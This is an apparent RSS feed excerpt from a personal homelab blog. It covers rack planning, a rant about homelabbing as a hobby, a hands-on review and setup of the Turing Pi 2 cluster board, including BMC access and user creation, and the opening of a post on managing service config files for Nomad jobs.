<p>The thing isn&rsquo;t going to be too much to look at. I generally don&rsquo;t have a problem
with being surrounded by tech - but the rack is open, and the side panels of my
chosen case are just plain metal. I&rsquo;m currently considering whether I might dig
deep (and I would have to dig REALLY deep) to find where my artistic creativity
is hiding. Or I might see whether there&rsquo;s an artist who would be willing to lend
me their creativity for a hefty sum of money. &#x1f605;</p>
<h1 id="final-words">Final words</h1>
<p>It took me quite a while to put all of this together, but I think I&rsquo;m pretty
happy with it now. I&rsquo;m mostly worried about the noise at the moment. But that
should be taken care of with the 3U cases with 120mm fans in them.</p>
<p>For now, I&rsquo;ve only bought two of the cases and the Pi case. I will immediately
mount the two Turing Pi 2 machines. But before I can mount the H3, I need to wait
for a friend to finish a 3D print of H3-to-Mini-ITX adapters for me. Once I&rsquo;ve
got those, I will order the last two H3s and cases. I will also look into HDD
noise reduction again.</p>
<p>In total, this &ldquo;simple&rdquo; change of mounts cost me a pretty penny.
The only real thing I could have had cheaper was the Pi mount. Instead of
using an actual rack mount, I could have gone with another shelf and put all the
Pis on there. But I really liked the idea of the Pi rack mount. The rack itself
as well as the cases are already the cheapest I could find. 19&quot; rack mount cases
are ridiculously expensive. No wonder everybody is moving to the cloud when
you can easily plunk down a thousand bucks just on a single 19&quot; server case.</p>
<p>I&rsquo;ve already got most of the parts - only the rack itself somehow got itself
lost somewhere in the current DHL strikes. Hopefully it finds its way to me
soon.</p>
<p>Does anybody have any good tips? Anything else I should be thinking about?</p>
]]></content:encoded>
    </item>
    <item>
      <title>Homelabbing: A really nice hobby</title>
      <link>https://blog.mei-home.net/posts/homelab-hobby/</link>
      <pubDate>Tue, 07 Feb 2023 23:30:40 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/homelab-hobby/</guid>
      <description>A small rant on people sticking their noses into my life, but mostly an ode to Homelabbing as a hobby</description>
      <content:encoded><![CDATA[<p>You are about to witness this blog&rsquo;s first rant. Proceed with caution, or not
at all if you&rsquo;re so inclined.</p>
<p>Without further ado: Piss off. No, I don&rsquo;t <em>need</em> this many machines. I want
this many physical machines. Every single one of them was a very conscious
decision driven by a clear design goal. Is your standard reaction to somebody
excitedly telling you about their newest hobby toy really &ldquo;do you need this much of your hobby?&rdquo;
or &ldquo;but it costs so much!&rdquo;? My fucking goodness.</p>
<p>/rant</p>
<p>Sorry, that needed to be said after I made the mistake of telling certain people
in my life about my newest Homelab plans for the umpteenth time, and I was getting
the same tired old &ldquo;What do you need all these computers for?&rdquo; and &ldquo;Aren&rsquo;t there
better things to spend your money on?&rdquo; questions again. And because I&rsquo;m rather
the non-confrontational type in my private life, you now got the above rant,
instead of the person who triggered it. Don&rsquo;t worry, if you can read and
understand the above, you&rsquo;re not the target. :slight_smile:</p>
<p>But I also want to take this chance not just to rant, but also to talk about
the homelabbing community and homelabbing as a hobby.</p>
<p>Over the years, I&rsquo;ve read a lot about people&rsquo;s motivations. From what I saw,
there are three very general categories:</p>
<ol>
<li>The people who got into it to hone their skills, e.g. with a small kubernetes
cluster</li>
<li>The people who got into it just for the fun of it</li>
<li>The people who got into it for ideological reasons, e.g. owning your own
data or getting away from the large web giants</li>
</ol>
<p>I came into it mostly from category two and a bit from category three. Let&rsquo;s
start with category three motivation: I don&rsquo;t really have an ideology here -
you will certainly see me encouraging people to try out homelabbing and
selfhosting things like Mastodon - <em>if they feel up to it</em>. But you won&rsquo;t see
me arguing for the more militant &ldquo;everybody should selfhost everything!&rdquo; stance
that the more radical category three people argue.</p>
<p>So for me, it&rsquo;s mostly just: Fun! My original trigger was a bit of &ldquo;every <em>real</em>
CS student should have a homeserver!&rdquo; thinking. And yes, I&rsquo;m now a bit embarrassed
about that. &#x1f609;
I&rsquo;m definitely not in category one. I&rsquo;m a software engineer by training, and
I&rsquo;m currently responsible for turning code into binaries in a large scale project.
If I really wanted to go looking for it, I might argue that homelabbing taught
me something about debugging approaches. And especially that a &ldquo;breadth first&rdquo; instead
of a &ldquo;depth first&rdquo; approach to debugging often leads to faster results. But at work,
I&rsquo;m in the enviable position to have an entire, rather competent team who runs
any workloads on any given one of a dozen or so Kubernetes clusters. I don&rsquo;t
think I ever needed to use any Homelab knowledge at work.
That is not to say I didn&rsquo;t have fun learning about networking, Ceph storage
clusters, Docker and so on. But it wasn&rsquo;t the main motivation. The main motivation
was always &ldquo;running services to use&rdquo;. And having fun while doing it. And yes,
sometimes that fun for me comes from doing &ldquo;it&rdquo; in the most complex, totally
overblown way that still looks maintainable. &#x1f913;</p>
<p>I&rsquo;ve been homelabbing since somewhere in the early 2010&rsquo;s. Only in the pandemic
years did I actually realize that there&rsquo;s a community around the hobby. And at
least from my PoV, it&rsquo;s a nice one. Take <a href="https://www.reddit.com/r/selfhosted/">r/selfhosted</a>
as an example. What has surprised me the most over the roughly two years
I&rsquo;ve been reading there is that the gatekeeping is rather minimal. There&rsquo;s no
&ldquo;Any real homelabber doesn&rsquo;t start below a dual Xeon machine&rdquo;. In fact, most
of the time when people are asking about good starter machines, the advice is
pretty solid: Either get a Raspberry Pi board (not too easy at the moment&hellip;)
or go and buy one of those corporate office machines from ebay for a couple hundred
bucks. Nobody there cares whether you&rsquo;ve got a 25U rack or a Pi.
Even VMs in the cloud are accepted there, although that might look a bit different
in <a href="https://www.reddit.com/r/homelab/">r/homelab</a>.</p>
<p>I&rsquo;ve now also found a very nice community on <a href="https://joinmastodon.org/">Mastodon</a>
talking about Homelabbing and selfhosting pretty much the entire day. Pretty much
my people. &#x1f913;</p>
<h2 id="so-what-is-homelabbing">So what IS homelabbing?</h2>
<p>I think the best definition I ever read for homelabbing is this:</p>
<blockquote>
<p>Cosplaying as a sysadmin</p></blockquote>
<p>And whether you&rsquo;re doing it with a Raspberry Pi or an entire rack full of servers
really doesn&rsquo;t matter. There&rsquo;s also selfhosting. I think that is pretty similar,
and most of the time I use the two terms interchangeably. The difference might be
that a homelabber might be cosplaying as a sysadmin, while a selfhoster might
be cosplaying as a DevOps engineer. And yes, the fact that that&rsquo;s pretty much the
same today is exactly what I meant to convey. &#x1f609;</p>
<p>To me, the first attempts at homelabbing came from a simple need: My laptop ran
out of space for all the Linux ISOs. And instead of going the simple route and
buying an external HDD, I got myself a tower server and deployed Samba and
Subversion on it. These days, I&rsquo;m in the process of migrating to a server rack.
As mentioned at the very beginning: Do I need this many machines? Nah. It&rsquo;s a bit
like coffee and cigarettes: I might not <em>need</em> them, but without them I&rsquo;m going
to become rather cranky. And it&rsquo;s the same with the Homelab.</p>
<p>So this is one of the reasons why you might want a Homelab: You just feel a need,
and instead of fulfilling it the sensible way, you get yourself another computer.</p>
<p>Bam. Homelabbing.</p>
<p>And once you&rsquo;ve deployed your first service, the next question almost inevitably
is: What else could I do with this? And it turns out that there&rsquo;s a lot you can do
with a single always on machine. By now, I&rsquo;m running my <a href="https://nextcloud.com/">own cloud storage</a>,
my own <a href="https://gitea.io/">code forge</a>, my very own <a href="https://ceph.com/">storage cluster</a>
and a lot of other things. When I recently got into IoT with a couple of smart plugs,
I was confident that I could use them without having to rely on some external
cloud - I already had a full stack available to run the MQTT broker, data gathering
and visualization.</p>
<p>I like to call my own Homelab &ldquo;HomeProd&rdquo;, a bit tongue-in-cheek. Today, I rely
on having the services it provides available all day long. And it&rsquo;s nice to
have them. It&rsquo;s nice to be able to just upload stuff from any place, and be
able to access it from any other place, without having to go via a cloud provider.
(Okay, perhaps I&rsquo;m a little bit in the ideological category. &#x1f937;)
I&rsquo;m running <a href="https://social.mei-home.net">my own social media</a>, after all. But
that has also changed the direction of my Homelab a little bit. I was never too far
out on the &ldquo;homeLAB&rdquo; side of things. But since I started running my own Mastodon
instance and this blog, I started to have other people (somewhat) rely on my Homelab.
Even if it&rsquo;s just the thought of adding to other Mastodon admins&rsquo; server load by
forcing them to retry delivery against my downed server a couple of times.
So downtimes became more and more unacceptable. I started to get really annoyed at
those times where I had to take my Homelab down, either to reconfigure networking
or reboot a host. Hence my quest to make my Homelab more highly available. And
with that we get back to the rant at the beginning: I&rsquo;ve got so many hosts because
I like to be able to reboot/shutdown/completely screw up a host without taking
the entire Homelab down. :slight_smile:</p>
<p>Like with many hobbies, a Homelab can be whatever you want it to be. It can be
as large or as small as you feel comfortable with. It can be as critical or as
ephemeral as you need it to be. It can be as reliable as AWS, or barely live
longer than a Saturday afternoon.</p>
<p>Have fun! And don&rsquo;t open ports in your firewall unless you are reasonably confident
in your abilities. &#x1f609;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Spreading out the Homelab: The Turing Pi 2 Cluster Board</title>
      <link>https://blog.mei-home.net/posts/turing-pi-2/</link>
      <pubDate>Sun, 29 Jan 2023 23:50:00 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/turing-pi-2/</guid>
      <description>Presenting my switch to a cluster of Raspberry Pis, why I did it and what board I am using</description>
      <content:encoded><![CDATA[<p>In my <a href="https://blog.mei-home.net/posts/homelab-2022/hardware/">previous post</a> on the hardware I am
using, I mentioned that I don&rsquo;t like my large Arch Linux x86 server very much.
Here, I will be going into the details of the problem I am having and how I
solved it.</p>
<h1 id="the-problem">The problem</h1>
<p>So until not very long ago at all, I only had a single server, with everything
running in a couple of Docker containers. Then COVID came, and I decided that
extending my homelab would be the perfect hobby for these lockdown times.
So I went and bought a beefier server with an Intel 10th Gen CPU and 96 GB
of RAM. Then I found <a href="https://linuxcontainers.org/lxd/introduction/">LXD</a> and
started introducing VMs. I also discovered <a href="https://ceph.io/">Ceph</a> and started
using it as my storage layer.</p>
<p>The problem which soon dawned on me: The Ceph VMs as well as the VMs running my
Nomad/Consul cluster were all running on an Arch system. Not exactly known for
stability, or the ability of behaving well when being updated after a longer
interval without updates. So reboots of the underlying OS were in order. And
those reboots of course required that I took down both, the Nomad cluster hosts
and the Ceph cluster hosts - both in VMs running on that Arch Linux server.</p>
<p>This results in needing to shut down everything when the underlying baremetal
OS needs an update.
First: Let&rsquo;s make clear that this actually works. Neither my Ceph cluster
nor my Nomad cluster have any problems with being shut down completely and
being rebooted.</p>
<p>But here&rsquo;s the problem: It annoyed me. An update went like this:</p>
<ol>
<li>Take down all services running in the cluster</li>
<li>Update and then shut down the cluster node VMs</li>
<li>Update and then shut down the cluster server node VM</li>
<li>Update and then shut down the Ceph VMs</li>
<li>Update and then reboot the underlying baremetal server</li>
<li>Start the Ceph VMs</li>
<li>Start the cluster server node VM</li>
<li>Start the cluster node VMs</li>
<li>Unseal Vault (important step I forget about half the time &#x1f605;)</li>
<li>Launch all services running on the cluster</li>
</ol>
<p>It is just annoying, and I was getting tired of not having my cluster available
during the maintenance windows. It annoys me even more now that I&rsquo;ve got a couple
of externally visible services, like Mastodon and this blog.</p>
<p>And yes dear readers, I&rsquo;m perfectly well aware that I&rsquo;m starting to stray
dangerously close to HomeProd territory. &#x1f609;</p>
<h1 id="the-solution">The solution</h1>
<p>The first, most obvious solution would have been three proper servers. Just
some nice, big, beefy machines. Which I could then run VMs for everything on.
Each of the hosts could get a Ceph VM for storage, a &ldquo;Controller&rdquo; VM for the
Nomad/Consul/Vault severs and a &ldquo;Cluster&rdquo; VM running the Nomad client for
workloads.</p>
<p>And in hindsight, over a year after I decided not to go that way, I think that
might have been the way to go. The right way. Instead, I&rsquo;ve now got no less
than four Raspberry Pis, running Vault/Consul/Nomad servers and Ceph MON
daemons (see <a href="https://blog.mei-home.net/posts/ha-nomad-stack/">this blog post</a>) as well
as one serving as a &ldquo;no dependencies at all&rdquo; bootstrap host. I&rsquo;ve also got
my Command and Control server, two Turing Pi 2 cluster boards with a total
of eight CM4 8 GB modules, an <a href="https://blog.mei-home.net/posts/udoo/">Udoo x86 II</a>
and an Odroid H3 pulling Ceph node duties. I&rsquo;ve also still got my beefy
X86 server. &#x1f926;</p>
<p>But that decision has been made, and lots of money has been spent. So, what do
I have now? This:</p>
<figure>
    <img loading="lazy" src="tp2.webp"
         alt="A picture of a mainboard with IO ports like RJ45 and USB, a standard ATX power connector and three Pi CM4 modules attached as well as an Nvidia Jetson in the process of being plugged into the last free slot on the board."/> <figcaption>
            <p>Via <a href="https://turingpi.com/">https://turingpi.com/</a></p>
        </figcaption>
</figure>

<p>This is the <a href="https://turingpi.com/">Turing Pi 2</a> cluster board.</p>
<h2 id="the-board">The Board</h2>
<p>This board has exactly what I always wanted: A good number of independent hosts,
with the ability to fit up to four modules into its SO-DIMM slots. The
ability to use a standard ATX power supply, so you don&rsquo;t have to come up with
some jank solution to powering your 3.5&quot; HDDs or case fans. It also allows
for quite some extensibility, with two SATA connectors and two mPCIe slots.
For the cherry on top, it also has four NVMe slots on the bottom of the board.
Sadly, these cannot be used when using the board with Raspberry Pi CM4 modules,
as those only have a single PCIe Gen 2 lane. This means at most a 500 MByte/s
throughput. And only a single lane to route to something. The Turing Pi team
initially considered integrating a PCIe switch to make all peripherals available
to all nodes, but found that both the necessary engineering to integrate the
switch as well as the switch chip itself would be too costly.</p>
<p>So now, the board&rsquo;s traces look approximately like this:</p>
<figure>
    <img loading="lazy" src="tp2_interconnection.png"
         alt="A simple block diagram showing the connections from the four node slots to the different peripherals and sockets on the board. Further details in the following text."/> <figcaption>
            <p>Via <a href="https://turingpi.com/">https://turingpi.com/</a></p>
        </figcaption>
</figure>

<p>As the board is mainly focused on the CM4 and its limited PCIe capabilities,
each node is connected to its own set of peripherals as follows:</p>
<ul>
<li>Node 1: A full 40 pin GPIO header and an mPCIe slot</li>
<li>Node 2: Another mPCIe slot</li>
<li>Node 3: Two SATA 6 GBit/s ports</li>
<li>Node 4: Two USB3 ports on the back IO as well as two more internal USB3 ports</li>
</ul>
<p>The board does not only support Raspberry Pi CM4, but also other modules.
Currently tested and confirmed to work are:</p>
<ul>
<li>Raspberry Pi CM4, both modules with and without eMMC</li>
<li>Nvidia Jetson Nano</li>
<li>Nvidia Jetson TX2 NX</li>
<li>Nvidia Xavier NX</li>
</ul>
<p>All of these, besides the CM4, also have access to bottom mounted NVMe slots.
With that bottom mounting, it&rsquo;s necessary to pay some attention when buying
a case. While the board itself is mini ITX, it might not fit all cases when
NVMe drives are fitted to the bottom.</p>
<p>In addition to all these peripheral goodies, the board also has an integrated
network switch chip, connected to the CM4s. It is a 1 GBit/s switch, with support
for some basic functionality like 802.1q VLANs.</p>
<p>Also connected to this switch is the BMC, the board management controller. It
is an Allwinner ARM SoC. It has some 1GB of flash available to it, and is running
the <a href="https://github.com/openbmc/openbmc">OpenBMC</a> distribution. This controller
is currently in an alpha state, only being able to run some basic functions.</p>
<p>With the BMC chip also come some nice Quality of Life improvements. For one
thing, it is possible to flash modules with eMMC directly from the board.
There&rsquo;s also a USB2 port which can be switched from one node to another in software
via the BMC.</p>
<p>Also extremely nice: All the serial consoles of the connected modules are
accessible on the BMC. This is especially nice for me, as it allows me to
observe netboots, and the problems accompanying them, far more easily than I can
now, futzing around with the kernel&rsquo;s netconsole.</p>
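<p>For reference, the netconsole approach I&rsquo;m alluding to means putting something like the
following onto the Pi&rsquo;s kernel command line - the ports, addresses and MAC here are of course
made up:</p>
<pre tabindex="0"><code class="language-conf" data-lang="conf">netconsole=6665@10.0.0.42/eth0,6666@10.0.0.10/aa:bb:cc:dd:ee:ff
</code></pre>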
<h2 id="how-im-using-the-board">How I&rsquo;m using the board</h2>
<p>At the moment, I can only speak to how the board works with the CM4 module.</p>
<p>I became aware of the Turing Pi team when I was looking into spreading out my
Ceph cluster at the end of 2021. I wanted multiple hosts, because Ceph can
greatly benefit from more hosts, and also because I wanted a bit of HA. The
Pi seemed alright back then as well, but running 3.5&quot; HDDs through the USB
connection of the Pi seemed suspect. So I was pretty happy when I came across
the first ideas for the Turing Pi 2 board - which already included the mPCIe
slots as well as the SATA ports. My thinking being: I can just put mPCIe to SATA
cards into the two slots for additional SATA ports. Plus, the usage of a
standard ATX power connector on the board was a big plus - it meant I didn&rsquo;t
have to futz about with a weird special power brick for the board itself and
I would have SATA power cables to supply my disks and case fans.</p>
<p>I even ran an interesting experiment to confirm that I could use the board for
Ceph nodes, by buying an official Raspberry Pi CM4 IO board. This board has a
PCIe slot connected to the CM4&rsquo;s one PCIe lane. I plugged in a PCIe to SATA
card to see how the CM4 would react. And after switching to Ubuntu 21.10,
the CM4 had no problem booting from one of the disks attached to the CM4
via the PCIe to SATA card. I ran that CM4 on an IO board for almost a year
as one of my Ceph nodes.</p>
<figure>
    <img loading="lazy" src="cm4_ceph.png"
         alt="A picture of a CM4 IO board, with a CM4 attached. The IO board sits in a PC case, not fastened anywhere, resting on the cardboard box the IO board came in. A SATA card is attached to the IO board&#39;s PCIe slot, with two SATA cables connected to it."/> 
</figure>

<p>And it actually worked. But to make it work, I had to restrict the memory usage
of the OSD, Ceph&rsquo;s per-disk storage daemon. The minimum is 2.5 GB of RAM. Which
is fine to run on an 8GB CM4. But I never felt too good with this potential
performance reduction. So over the past year, I looked for alternatives - and
found one, in the <a href="https://www.hardkernel.com/shop/odroid-h3/">Odroid H3</a>.</p>
<p>Definitely too long story short: At this point, I will not be running any
Ceph nodes on the Turing Pi 2 boards anymore. Instead, all of the Pis on it
will be dedicated as Nomad cluster nodes running my workloads. All of the
Pis are also netbooting. If you are in for a really exhaustive look at netbooting
Raspberry Pis, have a look at my <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">posts on the topic</a>.</p>
<h2 id="setting-up-the-board">Setting up the board</h2>
<p>I received my board about two weeks ago. In addition to the board itself,
I had also ordered CM4 carrier boards, to adapt the Turing Pi&rsquo;s SO-DIMM slots
to the CM4 connector. I had also already ordered the <a href="https://www.fractal-design.com/de/products/cases/node/node-804/">Fractal Design Node 804</a>. I had ordered those when I still thought I
would use the boards with a couple of disks. Now they&rsquo;re way too big.</p>
<p>I had also ordered two boards, and I got pretty lucky: I was able, over the
past year, to assemble eight CM4 8 GB modules. With that, I&rsquo;m a lot luckier
than a lot of the other people in the Turing Pi community, who now got their
boards, but weren&rsquo;t able to source any of the compatible modules due to the
general Raspberry Pi shortage.</p>
<figure>
    <img loading="lazy" src="unpacked.jpg"
         alt="A picture of a Turing Pi 2 board, a Turing Pi 2 CM4 adapter board and eight Raspberry Pi CM4 modules with heatsinks attached."/> 
</figure>

<p>This shows my haul. I had already previously prepared all of the CM4 boards,
by attaching <a href="https://www.waveshare.com/cm4-heatsink.htm">this CM4 heatsink from Waveshare</a>.
The attachment of the heatsink was a bit fiddly, due to there not being any tool
to hold the standoffs steady while fastening the screws. My fingers were a bit
sore after I had finished up all eight of them. &#x1f609;</p>
<p>The first setup of one of the boards, without any modules, revealed an amusing
thing: Like for normal PC mainboards, the power supply provides a 5V standby
rail. In PCs, this is for example used to provide the necessary power for the
NIC to listen for Wake-on-LAN packets.
This standby power was enough to immediately turn on the BMC, as well as supplying
the switch chip and a couple of LEDs on the board. The only problem was in
getting a connection to the BMC OS. By default, there is an SSH server running.
But: The only account available by default is <code>root</code>. And root access is
disabled in SSH by default.</p>
<p>Luckily, there&rsquo;s a really nice community on the Turing Pi Discord server. And
a couple of people had gotten their Turing Pi board before me, and had already
figured out how to get into the BMC by connecting to UART. I&rsquo;m not sure what
to think about this approach - yes, having root logins with a default password
available in the docs to login via SSH is a bad default config. But it&rsquo;s also
extremely convenient. As things stood, if you don&rsquo;t have a UART to USB cable,
you couldn&rsquo;t log into the BMC.</p>
<p>But logging into the BMC isn&rsquo;t actually necessary to access all available
functionality. There&rsquo;s a web UI. With exactly zero authentication. A web UI
which, among other things, allows switching on/off any of the nodes. And
flashing the BMC.
But it is worth mentioning: The firmware on the BMC is currently in an alpha
state. It will be completely rewritten in the near future.</p>
<p>But I was lucky: I already had a UART to USB cable at home. Connecting it to
the Turing Pi&rsquo;s BMC UART pins provided me with a way to login, using the
user <code>root</code> and the password <code>turing</code>.</p>
<figure>
    <img loading="lazy" src="uart.jpg"
         alt="A close up of the Turing Pi board&#39;s BMC UART header. There are several cables attached, a brown one to GND, a green one to RX and a white one to TX."/> 
</figure>

<p>When connecting UART, it is always important to remember that the TX pin of the
UART adapter needs to be connected to the RX pin on the board, and the same for
the RX pin on the adapter and the TX pin on the board.</p>
<p>The BMC OS also has one annoying quirk: It randomly generates a new MAC for the
NIC of the BMC chip at boot time. So whenever you reboot, your DHCP server
will see a new MAC.
This can be fixed by logging into the BMC and opening <code>/etc/network/interfaces</code>
and adding the following line to the <code>iface eth0</code> config:</p>
<pre tabindex="0"><code class="language-conf" data-lang="conf">hwaddress ether 5a:3c:de:c4:cb:18
</code></pre><p>Obviously, change the MAC address. &#x1f609;
Once that&rsquo;s done, your DHCP server will always see the same MAC from the BMC,
and you can safely do static DHCP assignments or even MAC address filtering or
MAC based VLANs.</p>
<p>To allow access to the BMC via SSH, everything is already configured reasonably
well. The only thing missing is the creation of a user apart from <code>root</code>, which
is sensibly not allowed to log in via SSH.</p>
<p>At this point, please note that the OpenBMC environment uses busybox. So
<code>usermod</code> will not be available. You need to get your <code>adduser</code> correct the
first time. &#x1f609;</p>
<p>So the first step here is creating the <code>/home</code> directory, which for some reason
does not actually exist yet. Once that&rsquo;s done, adding the user is simple:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>adduser -s /bin/bash -D my_user
</span></span></code></pre></div><p>Then, create the user&rsquo;s <code>.ssh</code> dir and add your SSH key to <code>/home/my_user/.ssh/authorized_keys</code>.</p>
<p>Once all of that is done, you should also change the root password to something
more sensible than the default.</p>
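<p>Spelled out, those last steps look roughly like this - <code>my_user</code> is the placeholder
from above, and the key is obviously your own:</p>
<pre tabindex="0"><code class="language-shell" data-lang="shell"># Create the SSH directory for the new user
mkdir -p /home/my_user/.ssh
chmod 700 /home/my_user/.ssh
# Add your own public key
echo &#34;ssh-ed25519 AAAA... me@laptop&#34; &gt;&gt; /home/my_user/.ssh/authorized_keys
chmod 600 /home/my_user/.ssh/authorized_keys
chown -R my_user /home/my_user
# And finally, set a new root password
passwd root
</code></pre>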
<p>Once the BMC was set up to my liking (as noted, not much to really do here, due to
the BMC firmware being in Alpha state) I plugged in my first CM4 and navigated
to the Turing Pi&rsquo;s IP to access the web UI.</p>
<figure>
    <img loading="lazy" src="web_ui.png"
         alt="A screenshot of the Turing Pi 2 web UI. At the top is a tabbed menu, with the points usb, power, nodeInfo, sdcard, other and update. The tab power is currently selected. On the rest of the page are four slider on/off buttons, with a button labeled Submit at the very bottom."/> 
</figure>

<p>Setting all the nodes to power on supplies power to the nodes. As I was netbooting,
I was able to avoid some initial uncertainty concerning the process of flashing Pi CM4s
connected to the board. The team took about a week to supply even the most
basic docs after the first customers got their boards. The credentials for logging
into the BMC were found by a user via trial and error. Same goes for the serial
console settings necessary for the UART connection to the BMC.
This really wasn&rsquo;t a stellar moment for the team.</p>
<p>But as said, for me everything was fine because I was netbooting my CM4s anyway,
so before too long, I had four modules blinking away happily:</p>
<figure>
    <img loading="lazy" src="all_connected.jpg"
         alt="A picture of a Turing Pi 2 board with four CM4 modules attached, with green LEDs blinking away on all four."/> 
</figure>

<p>After some additional testing of the second board, I knew that everything was
working and continued to the second phase, properly deploying it all.</p>
<p>As mentioned above, I had bought the Fractal Node 804. Which is a really nice
case, in typical Fractal high quality fashion. It&rsquo;s just that they are way
too big these days.</p>
<figure>
    <img loading="lazy" src="in_case.jpg"
         alt="A picture of a Turing Pi 2 board in a Fractal Node 804 case. The mini ITX board takes up only a small amount of the available space."/> 
</figure>

<p>While installing the Turing Pi 2, I again thought that the ATX power connector,
and with it the ability to just use a standard PC PSU, might be one of its
biggest advantages. Due to using a standard PSU, I had the necessary SATA power
connectors available to attach to the 804&rsquo;s integrated fan hub/controller. Hence,
I did not have to worry about how to power the case fans, and I also get some
control over them.</p>
<p>After putting both of the boards into their respective cases, I only had to
boot the Pis, as I had already prepared their netbooting volumes before. Now,
they have become part of my Nomad cluster and are running jobs already.</p>
<p><figure>
    <img loading="lazy" src="nomad_topo_before.png"
         alt="A screenshot of the Nomad cluster topology page. It shows four hosts, with a total of 35 GB of RAM and 109 GHz of CPU."/> <figcaption>
            <p>My Nomad cluster topology before adding the Pis</p>
        </figcaption>
</figure>

<figure>
    <img loading="lazy" src="nomad_topo_after.png"
         alt="Another screenshot of the Nomad cluster topology page. It shows twelve hosts, with a total of 96 GB of RAM and 157 GHz of CPU."/> <figcaption>
            <p>My Nomad cluster topology after adding the Pis</p>
        </figcaption>
</figure>
</p>
<p>My Nomad cluster has not only become larger, it has also become better distributed.
So at least for now, I can easily reboot any cluster host, and the jobs which
ran on it will easily find another home. &#x1f642;</p>
<h1 id="final-thoughts">Final thoughts</h1>
<p>I like the board. Everything on it works well. Even the alpha firmware that&rsquo;s
currently on it. True, I can&rsquo;t control the integrated switch yet, but for now
at least that&rsquo;s okay. I can remotely switch the modules on and off too. And
I have them on a standard ATX PSU, with a mini ITX form factor.</p>
<p>This was actually my first Kickstarter. And at least for me, it was wildly
successful. The team delivered most of what they promised, and even if nothing
else comes out of it, I would still be rather satisfied, as it already does all
I need from it.
It was definitely a good thing that I already knew that they had previously
delivered the Turing Pi 1 successfully as well, which was still using Pi CM3
modules. And they were rather active on their Discord too. My worries about
getting scammed here were rather on the low end right from the start.</p>
<p>During the entire process from the end of the Kickstarter in the summer of
2022 to the delivery in the middle of January, there were a couple of hiccups.
One thing the team could do better is communication. There were a number of delays,
created first by introducing NVMe slots, then by switching out the firmware chip.</p>
<p>As previously mentioned, the firmware itself is also in a very alpha stage.</p>
<p>There is also currently a problem with the battery for the RTC. If it is
inserted, the BMC won&rsquo;t boot successfully. Removing it works around the problem,
but then you don&rsquo;t get reliable time on the BMC.</p>
<p>But I&rsquo;m still feeling very confident in saying: If a mini ITX board with a
standard ATX 24 pin power connector for four Raspberry Pi CM4 modules (or some
of the other supported modules) with some interesting peripherals sounds
appealing to you, there&rsquo;s no need to hesitate at this point.</p>
<p>The biggest fumble by the team at Turing Machines was that they had boards in
people&rsquo;s hands, but absolutely no documentation whatsoever on how to actually
use them.</p>
<p>If you&rsquo;re interested, head over to <a href="https://turingpi.com/">turingpi.com</a> and their
shop. But note: At time of writing, not even all Kickstarter backers have received
their board(s) yet, so it might be a while until you receive yours when buying
via the shop now.</p>
<p>Finally, one problem I found: Having to prepare images for eight hosts, where
there are only a couple of differences in the kernel command line and the
hostname, is tedious. Really tedious. I recently saw a video by the Youtuber
TechnoTim <a href="https://www.youtube.com/watch?v=lEqD3mRcqSo">here</a> where he takes
a look at Canonical&rsquo;s <a href="https://maas.io/">MaaS</a>. This looks like an interesting
possibility for making Raspberry Pi provisioning a bit less manual. But I will
have to look a bit deeper into it, especially to see whether it would be able
to mount Ceph RBD volumes on newly commissioned hosts. Also,
<a href="https://maas.io/tutorials/build-your-own-bare-metal-cloud-using-a-raspberry-pi-cluster-with-maas#1-overview">their Raspberry Pi guide</a>
currently requires the use of the Raspberry Pi UEFI boot approach, which looks
like it always needs some sort of local storage? This would negate all the
advantages of netbooting for me. I will have to see.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Handling service configuration files in Nomad</title>
      <link>https://blog.mei-home.net/posts/nomad-configs/</link>
      <pubDate>Thu, 12 Jan 2023 22:08:27 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/nomad-configs/</guid>
      <description>A horrific tale of S3-as-a-filesystem</description>
<content:encoded><![CDATA[<p>I&rsquo;ve just had a major success: My <code>docker-compose</code>-like Nomad script can now
use the <code>nomad</code> binary with the <code>job run -output</code> command to transform an HCL
file into JSON for use with the Nomad API. Before, my tool was using the Nomad
API&rsquo;s <a href="https://developer.hashicorp.com/nomad/api-docs/jobs#parse-job">/v1/jobs/parse</a>
endpoint.</p>
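<p>To illustrate what that looks like in practice, here is a minimal sketch.
The file name and API address are placeholders, not my actual setup:</p>
<pre tabindex="0"><code># Convert the HCL job spec into the JSON payload the HTTP API expects.
# According to the docs, -output prints the JSON that would be submitted
# to the API instead of actually running the job.
nomad job run -output foo.hcl &gt; foo.json

# Submit the JSON job spec to the jobs endpoint.
curl -X POST --data @foo.json http://localhost:4646/v1/jobs
</code></pre>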
<p>This meant that I was not able to make use of any of the <em>HCL2</em> functions
recently introduced. I&rsquo;m mostly interested in using the <a href="https://developer.hashicorp.com/nomad/docs/job-specification/hcl2/functions/file/file">file</a>
and <a href="https://developer.hashicorp.com/nomad/docs/job-specification/hcl2/functions/file/fileset">fileset</a>
functions, and I want to tell you why.</p>
<h1 id="handling-service-config-files-in-nomad">Handling service config files in Nomad</h1>
<p>What I want to talk about are not Nomad&rsquo;s own config files or job specs. Instead,
what I&rsquo;m going to talk about are the config files for the services I&rsquo;m running
on Nomad. For example <a href="https://docs.gitea.io/en-us/config-cheat-sheet/">Gitea&rsquo;s app.ini</a>
or <a href="https://docs.fluentd.org/configuration/config-file">Fluentd&rsquo;s</a> config files.</p>
<p>Somehow, you need to make sure that those are available to the service you&rsquo;re
running when it starts.</p>
<p>There are several obvious solutions to it. I could put those files onto the
service&rsquo;s CSI volume, for example. But an approach like this is sub-optimal,
because I would also like to have my config files in a Git repo. And I would
like to have them in the same Git repo as my Nomad job specs. And I would like
to not put the entire repo into every job&rsquo;s CSI volume. And what about jobs
which otherwise don&rsquo;t need any volumes? Just create one for that one config file?</p>
<p>Doesn&rsquo;t sound right, does it?</p>
<p>Of course, Nomad has a solution to that. Several in fact. Let&rsquo;s start with the
simplest one: You can just put your config files into the job spec. The <a href="https://developer.hashicorp.com/nomad/docs/job-specification/template">template stanza</a>
has the <code>data</code> option, for example.
But that also seems wrong to me, because it would mix concerns in a single file:
Configuring the service, and telling the orchestrator how to run that service.</p>
<p>So the next approach is the <a href="https://developer.hashicorp.com/nomad/docs/job-specification/artifact">artifact stanza</a>.
It looks something like this:</p>
